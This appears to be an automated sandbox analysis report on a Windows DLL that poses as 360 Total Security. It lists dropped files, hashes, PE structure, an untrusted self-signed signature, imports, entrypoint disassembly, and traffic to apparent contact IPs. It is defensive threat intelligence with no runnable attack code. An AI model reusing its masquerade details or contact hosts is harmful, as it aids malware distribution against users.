Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.204799341770279
Encrypted:	false
SSDEEP:	3:oVXUJUdUGZVoIRAW8JOGXnEJUdUGZVomn:o9UJUdXVj9qEJUdXVx
MD5:	219D523BEF62B21E8758584711A71C9D
SHA1:	75AB1ED37C50BDDC84628BB1C1FE774D4510A5D4
SHA-256:	539ABC6B5B6970CDBDB99E3C3BF99CFB44A665FA53A6E1F507034C7360E1ECA1
SHA-512:	72ACE9A8209E656A68C68F8AE70BAF6AA2EA49D8A5DD762CCCACCA99CA4E8E1AF1078360F74FB59DCB76DAD98645C92CE168EEA0C2F1371C66C46871C3A207F5
Malicious:	false
Preview:	[2021/01/12 18:11:50.302] Latest deploy version: ..[2021/01/12 18:11:50.302] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF3766C4D38666A50B.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39601
Entropy (8bit):	0.5623692941006625
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+DdvmiIiuEltrzsEltrzcEltrz9:kBqoxKAuvScS+Ddvmtn+u+e+X
MD5:	0ABA3E912A00FF12C9BCD751E552C6AC
SHA1:	604B72B119AC4FCC60CC6B78DD06E47674960F59
SHA-256:	C389DC44808E3643271BF35C29D43D49870678575B4A72B7B08F0200DBB1BF91
SHA-512:	D0FAE570D7200680054EA49B47DEE6F5B41B64BF7D6B33757D7C3279ACB7D0B09086B77C9BBC1F1B934C2B2B744B62EE3AFA3D040F6453C0EB72DFC9003F5DE0
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3E209F7CF6B4A35B.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39649
Entropy (8bit):	0.5716084686167021
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+FrJ40I0W6LEVlMqXU4E6LEVlMqXU4M6LEVlMqXU49:kBqoxKAuvScS+FrJ4b5pUFpUJpUO
MD5:	FE4D1D2970B77EDB4C11B5D7FEA12FF8
SHA1:	D564043E854466041B7E0F91012C1DBEFB1E995B
SHA-256:	6AF2FEABAA89E67042A1849F9330DF90913C7243439BE76DEF0C11AC4EFF4BEF
SHA-512:	30C625208CCE2991710390169D601E835AB22BCCA2BA073F67D7D43783A3573C9B7177F1D46E56A1D0FA689ACB894682139D9A41BFB40904BD49425410621F7F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF54395E81EA74D2E8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	0.5716412962748327
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+kCo5i8FWs0APcFWs0APcFWs0AP9:kBqoxKAuqR+kCo5i8FWNfFWNzFWNY
MD5:	225491E9A52660D327EE010F0FFD7070
SHA1:	6A72F7C91D51326EAED6D42BA5CB3E0716DD71B6
SHA-256:	9B683729BC13A1D0180F367471738346BDEAD8BB0D9D6DA99846A0117C3B0549
SHA-512:	40C2FE2A98C2C38D1E22E7CE2A0124341FD7BD96D9D03F56665BE1D969239BB6626F2D98A64FE8E01ED269F0DA0940113BBF1246EAB40CF0B2ED6E56F7D6A22F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB7C0716C27FE0C9F.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39617
Entropy (8bit):	0.5681913439869308
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+WQKjfIfGZSL7OxoJ2MZSL7OxoJ2kZSL7OxoJ2V:kBqoxKAuvScS+WQKjQOEOYfEOYLEOYw
MD5:	B891791FD5F7FB01AE66573925AEC2BD
SHA1:	7FC95E18909E2ACFA2E3F8846074B2D85A83997E
SHA-256:	9AFD033C6F2B0DA935BAC11CEC48F845491380EF821B590A464FA41EC0D7EA02
SHA-512:	7ABE34AFDA73FB224B5D834CABB9DEF20F24B339FE40A9872C90F28CD0ADDCAA5D3F1350AE993FA9B53206BB0420F9E35AD9C6B53A24388028F034A1A2B3ECEB
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFBD53854F4C7AA5DC.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4113805245720888
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loIF9low9lWZcp8:kBqoIb9Zcp8
MD5:	08F7E35DD0191E808397C6753BA9350B
SHA1:	002F9021DFA2DB2B1FDBC98BBF0D410B8D325E98
SHA-256:	45B116C944E6C20D9B4BB7FBAA70E1DCC5F67AFB5797F3F9A90C29BA407821A6
SHA-512:	2A8C7ABECB23235B0C78A2EFF5F1EEB1189DEA99803243E8126B5B011D1A483E2E1E41431B0D2F5AA7F65CD9AE05504C9E07A34432F0C49786F59B7B8A9FA319
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD091490AA9F67B44.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.41009752640370745
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loJF9loL9lWukVEtcF:kBqoIsyukVEtcF
MD5:	F5DB7463CA435FA62E7BB0639988AA73
SHA1:	0731532F2086815F0150B6D2E0250621198387AF
SHA-256:	85A8380F1BB105DC216E3C58474DB7CDD30E1BE47C8B465AD0F63A47BF86C037
SHA-512:	353CEF0DCB0F67895F4C6E1B06D91D365098EB0CAFBCE919CF0CFCDF3DADEE8ED06D78F5A556AFAEF429487E70069D6433BE13C250122EBD54D2EC4DC9B1F43A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4122061728840318
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lojF9lop9lWszhQcQ:kBqoIyssNQcQ
MD5:	1DE5EDAF14E2164927A5AFB0414A7429
SHA1:	66F0984B05D3605DC986A9627E259894165AD2D9
SHA-256:	DA384F89996B303CDB54D07F4EC8CAD7F4C358248141D52FB85EBB3B713D7DB7
SHA-512:	040D7A1DC989476B303C55AA237B0D27219C4009B23A65DAE16111424CC67FDA8B30D1103816E6F39F59AADF4ECD167F8BB61DAF1E25C80E57879DD377F62977
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFEB82DA7A2E1DEEA8.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4119123300741825
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loFF9lof9lWGSCwV:kBqoIAeGZwV
MD5:	4123E0366D9F6C943DED85A49D8D3883
SHA1:	29ABF3A5CDFBD1EA6903364773994B6CCC64B230
SHA-256:	47DDC5051E14E787662AA9D73359FA00A877EECFB0A9E86D23CC3BBB8B8F60B1
SHA-512:	1E4E7308DEC36050041B2073727387767B3911038DB574DF0F4169DFC31764CC83F8B68D0C10F7B56CE8E543632032E7CE884DAF37952205A218D597AD06E800
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.5579670901819425
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.12% Windows Screen Saver (13104/52) 1.28% Win16/32 Executable Delphi generic (2074/23) 0.20% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20%
File name:	zQ32b1FVcL.dll
File size:	365400
MD5:	eed4174c8a96dd7b611d9f109c71e20f
SHA1:	c471724d86fd269a19932280361ca52e1e294f19
SHA256:	e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
SHA512:	3c73f6b30b28afbb601473eba9100a798e1a5234ec4fe968a7b6fc0119c623633ecd8ab195a1355b96cc0d121f2c52b0235987304a84e2cb212e56714a63223c
SSDEEP:	3072:Y/citbV4XnbWnfPAQXKSaJtoE7fWtzS3gI6nZVzwqUlre:IHtbyinfPAQ6SaJtoOoxzwqWre
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~._...........!...2.2...H......@(.......P.......................................$.....................................

File Icon


Icon Hash:	90e4ac90fc3c2480

Static PE Info

General
Entrypoint:	0x10032840
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5FFD7E17 [Tue Jan 12 10:46:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9f377d945db467e35cbad38db9412261

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=CXCBDHWDYFSIVYHKIN
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	1/11/2021 10:01:25 PM 12/31/2039 3:59:59 PM
Subject Chain	CN=CXCBDHWDYFSIVYHKIN
Version:	3
Thumbprint MD5:	50CCAE9553A1CBB0CD2802851EF63025
Thumbprint SHA-1:	01B4FBF379C40FFDE1FA7EABB4BF154CBC3DEBE8
Thumbprint SHA-256:	90953EF6995AD2794D281E501D865F73B73CA5DA97C8DC220BACA4F8371DC391
Serial:	5AE69522318BF5BC44A76492C927CD62

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 54h
mov dword ptr [ebp-08h], 00000001h
mov dword ptr [ebp-04h], 00000000h
mov eax, ebp
mov ecx, dword ptr [eax+08h]
mov dword ptr [1004FCCCh], ecx
mov dword ptr [1004FCACh], ebp
mov dword ptr [ebp-0Ch], 00000001h
mov dword ptr [ebp-10h], 00000001h
mov eax, dword ptr [ebp-10h]
push eax
call dword ptr [1004EDB8h]
mov ecx, dword ptr [ebp-10h]
push ecx
call dword ptr [1004EDBCh]
mov edx, dword ptr [ebp-0Ch]
push edx
call dword ptr [1004ED18h]
call dword ptr [1004ED1Ch]
movzx eax, byte ptr [ebp-0Ch]
push eax
call dword ptr [1004ED20h]
call dword ptr [1004ED24h]
mov ecx, dword ptr [ebp-10h]
push ecx
call dword ptr [1004EDC0h]
mov edx, dword ptr [ebp-10h]
push edx
call dword ptr [1004EDC4h]
mov eax, dword ptr [ebp-0Ch]
push eax
call dword ptr [1004EDC8h]
mov ecx, dword ptr [ebp-10h]
push ecx
call dword ptr [1004EDCCh]
mov edx, dword ptr [ebp-0Ch]
push edx
call dword ptr [1004EDD0h]
mov eax, dword ptr [ebp-10h]
push eax
call dword ptr [1004EDD4h]
mov ecx, dword ptr [ebp-0Ch]
push ecx
call dword ptr [1004ED18h]
call dword ptr [1004ED28h]
mov edx, dword ptr [ebp-10h]
push edx
call dword ptr [1004EDD8h]
call dword ptr [1004ED2Ch]
mov eax, dword ptr [ebp-0Ch]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4e7f8	0xa0	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0xa01c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x57e00	0x1558	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5b000	0x484	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4ebb0	0x318	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3306f	0x33200	False	0.254675084046	data	4.93227847652	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data2	0x35000	0x64	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data	0x36000	0x19d28	0x19e00	False	0.0270135114734	data	0.511152308625	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x50000	0xa01c	0xa200	False	0.571445794753	data	6.6335343619	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5b000	0x484	0x600	False	0.688151041667	data	5.65875691292	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x50358	0x4716	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Chinese	China
RT_ICON	0x54a70	0x25a8	dBase III DBT, version number 0, next free block index 40	Chinese	China
RT_ICON	0x57018	0x10a8	data	Chinese	China
RT_ICON	0x580c0	0x988	data	Chinese	China
RT_ICON	0x58a48	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_DIALOG	0x58eb0	0x42	data	Chinese	China
RT_DIALOG	0x58ef4	0x34	data	Chinese	China
RT_DIALOG	0x58f28	0x60	data	Chinese	China
RT_DIALOG	0x58f88	0x42	data	Chinese	China
RT_RCDATA	0x58fcc	0x200	ASCII text, with very long lines, with CRLF line terminators	English	United States
RT_RCDATA	0x591cc	0x80	data	English	United States
RT_GROUP_ICON	0x5924c	0x4c	data	Chinese	China
RT_VERSION	0x59298	0x2b4	data	Chinese	Taiwan
RT_VERSION	0x5954c	0x2b4	data	English	United States
RT_VERSION	0x59800	0x2b4	data	Portuguese	Brazil
RT_VERSION	0x59ab4	0x2b4	data	Turkish	Turkey
RT_VERSION	0x59d68	0x2b4	data	Chinese	China

Imports

DLL	Import
KERNEL32.dll	QueryPerformanceFrequency, GetDateFormatW, ResetEvent, QueryPerformanceCounter, SetEvent, GetCurrentProcess, OpenEventW, ResumeThread, WaitForSingleObject, DuplicateHandle, WriteFile, GetLastError, GetExitCodeThread, CreateFileW, MoveFileW, lstrlenA, ReadFile, Sleep, GetFileSize, CreateEventW, GetLocaleInfoW, CloseHandle, GetLocalTime, LoadLibraryW, GetWindowsDirectoryW, FormatMessageW, CreateProcessW, LocalFree, FindFirstFileW, CopyFileW, FindClose, SetLastError, CreateDirectoryW, lstrlenW, GetSystemDirectoryW, GetTempPathW, GetDriveTypeW, GetFileTime, GetUserDefaultLCID, ExpandEnvironmentStringsW, GetPrivateProfileStringW, GetFileInformationByHandle, GetFileAttributesA, FileTimeToDosDateTime, GetSystemInfo, CreateFileA, WideCharToMultiByte, FileTimeToLocalFileTime, lstrcmpiW, GetTempFileNameW, GetFileAttributesW, GetProcAddress, LocalAlloc, GetModuleHandleW, GetStartupInfoW, DeleteFileW, ExitProcess, GetTickCount, LoadLibraryA, MultiByteToWideChar, FreeLibrary, GetModuleHandleA, GetStdHandle, GetConsoleScreenBufferInfo, VirtualAlloc, HeapFree, GetProcessHeap, HeapAlloc, VirtualFree, SetConsoleCtrlHandler, lstrcpyA, FindFirstFileA, GetWindowsDirectoryA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetPrivateProfileStringA, SetUnhandledExceptionFilter, lstrcatW, lstrcmpiA, GetSystemDefaultLCID, GetSystemWindowsDirectoryW, GetCurrentThreadId, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, UnhandledExceptionFilter, GetStartupInfoA
USER32.dll	LoadIconW, CopyIcon, GetProcessWindowStation, IsCharAlphaA, GetKBCodePage, GetInputState, GetActiveWindow, GetWindowTextLengthA, IsWindowEnabled, IsIconic, PaintDesktop, GetTopWindow, GetMenuContextHelpId, GetListBoxInfo, GetSysColorBrush, GetKeyState, LoadCursorFromFileW, GetMenuCheckMarkDimensions, GetKeyboardLayout, IsWindow, CloseWindowStation, VkKeyScanW, CharLowerA, DrawMenuBar, CharNextW, IsCharUpperA, IsGUIThread, OpenIcon, IsCharLowerW, GetClipboardData
GDI32.dll	GetKerningPairsA, CreateEllipticRgn, PATHOBJ_vEnumStartClipLines, GetBoundsRect, FONTOBJ_pfdg, GetDIBColorTable, SetTextCharacterExtra, GetTextFaceW, GetColorSpace, RealizePalette, SetMetaRgn, CreateHalftonePalette, PathToRegion, GetObjectType, GetStretchBltMode, GetDCBrushColor, GetFontLanguageInfo, GetSystemPaletteUse, GetTextColor, CreatePatternBrush, GetEnhMetaFileA, CloseFigure, GetLayout, CloseEnhMetaFile, GetTextCharset, GetEnhMetaFileW, GetGraphicsMode, AddFontResourceW, FlattenPath, SaveDC, GdiGetBatchLimit, GetDCPenColor, EndDoc, EndPage, GetROP2, GetMapMode, GetStockObject, StrokePath, DeleteObject
COMDLG32.dll	GetOpenFileNameW
ADVAPI32.dll	IsTextUnicode, RegCloseKey, RegCreateKeyExW, RegOpenKeyExW, RegEnumKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExW, RegDeleteKeyW, RegDeleteValueW, RegGetKeySecurity, RegOpenKeyW, RegSetKeySecurity, RegConnectRegistryW
SHELL32.dll	ExtractIconW, DragQueryFileAorW, SHBindToParent, DoEnvironmentSubstW, ExtractIconA, ShellExecuteA, SHCreateProcessAsUserW, SHPathPrepareForWriteW, SHPathPrepareForWriteA, SHIsFileAvailableOffline, ExtractAssociatedIconW, SHGetSpecialFolderPathA, ShellExecuteEx, DragAcceptFiles, ExtractAssociatedIconA
SHLWAPI.dll	StrChrIA, StrRChrIW, StrCmpNW, StrChrA

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2016
InternalName	360SkinView
FileVersion	1,0,0,1036
ProductName	360 Total Security
ProductVersion	1,0,0,1036
FileDescription	360 Total Security
OriginalFilename	360SkinView.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States
Chinese	Taiwan
Portuguese	Brazil
Turkish	Turkey

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 18:10:50.297225952 CET	49741	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:50.298315048 CET	49742	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:51.308362007 CET	49741	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:51.308661938 CET	49742	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:53.324075937 CET	49741	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:53.324207067 CET	49742	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:57.345119953 CET	49743	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:10:58.355848074 CET	49743	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:11:00.356750965 CET	49743	80	192.168.2.3	193.56.255.166
Jan 12, 2021 18:11:51.340176105 CET	49746	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.340984106 CET	49747	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.383164883 CET	80	49746	47.91.89.242	192.168.2.3
Jan 12, 2021 18:11:51.383349895 CET	49746	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.383809090 CET	80	49747	47.91.89.242	192.168.2.3
Jan 12, 2021 18:11:51.383956909 CET	49747	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.384207964 CET	49746	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.427160025 CET	80	49746	47.91.89.242	192.168.2.3
Jan 12, 2021 18:11:51.428916931 CET	49746	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.431766033 CET	49746	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.474773884 CET	80	49746	47.91.89.242	192.168.2.3
Jan 12, 2021 18:11:51.820136070 CET	49747	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.863253117 CET	80	49747	47.91.89.242	192.168.2.3
Jan 12, 2021 18:11:51.864375114 CET	49747	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.864593983 CET	49747	80	192.168.2.3	47.91.89.242
Jan 12, 2021 18:11:51.907457113 CET	80	49747	47.91.89.242	192.168.2.3
Jan 12, 2021 18:12:13.192826033 CET	49754	443	192.168.2.3	193.56.255.166
Jan 12, 2021 18:12:16.196799994 CET	49754	443	192.168.2.3	193.56.255.166
Jan 12, 2021 18:12:22.197288990 CET	49754	443	192.168.2.3	193.56.255.166

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 18:09:20.637145042 CET	53	60831	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:21.721847057 CET	60100	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:21.772547960 CET	53	60100	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:22.891220093 CET	53195	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:22.939428091 CET	53	53195	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:23.900151968 CET	50141	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:23.950989008 CET	53	50141	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:24.947624922 CET	53023	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:24.995771885 CET	53	53023	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:26.164246082 CET	49563	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:26.220573902 CET	53	49563	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:27.550584078 CET	51352	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:27.598649025 CET	53	51352	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:28.677367926 CET	59349	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:28.725328922 CET	53	59349	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:29.657654047 CET	57084	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:29.714103937 CET	53	57084	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:30.796097994 CET	58823	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:30.844058037 CET	53	58823	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:32.071444988 CET	57568	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:32.119316101 CET	53	57568	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:33.206152916 CET	50540	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:33.265199900 CET	53	50540	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:34.017821074 CET	54366	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:34.065747976 CET	53	54366	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:50.197422028 CET	53034	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:50.264039993 CET	53	53034	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:51.786272049 CET	57762	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:51.834120035 CET	53	57762	8.8.8.8	192.168.2.3
Jan 12, 2021 18:09:56.427886963 CET	55435	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:09:56.488300085 CET	53	55435	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:04.902498007 CET	50713	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:04.965913057 CET	53	50713	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:06.226042986 CET	56132	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:06.303421021 CET	53	56132	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:06.323513031 CET	58987	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:06.371398926 CET	53	58987	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:06.383672953 CET	56579	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:06.440094948 CET	53	56579	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:10.150937080 CET	60633	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:10.198676109 CET	53	60633	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:14.890048027 CET	61292	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:14.954274893 CET	53	61292	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:26.454123020 CET	63619	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:26.502043009 CET	53	63619	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:29.735868931 CET	64938	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:29.793607950 CET	53	64938	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:34.917556047 CET	61946	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:34.976722956 CET	53	61946	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:35.916927099 CET	61946	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:35.975995064 CET	53	61946	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:36.919260979 CET	61946	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:36.969955921 CET	53	61946	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:38.938815117 CET	61946	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:39.001219034 CET	53	61946	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:42.933249950 CET	61946	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:42.983968019 CET	53	61946	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:48.636003971 CET	64910	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:48.693726063 CET	53	64910	8.8.8.8	192.168.2.3
Jan 12, 2021 18:10:49.856673002 CET	52123	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:10:50.276988029 CET	53	52123	8.8.8.8	192.168.2.3
Jan 12, 2021 18:11:01.951796055 CET	56130	53	192.168.2.3	8.8.8.8
Jan 12, 2021 18:11:02.002507925 CET	53	56130	8.8.8.8	192.168.2.3
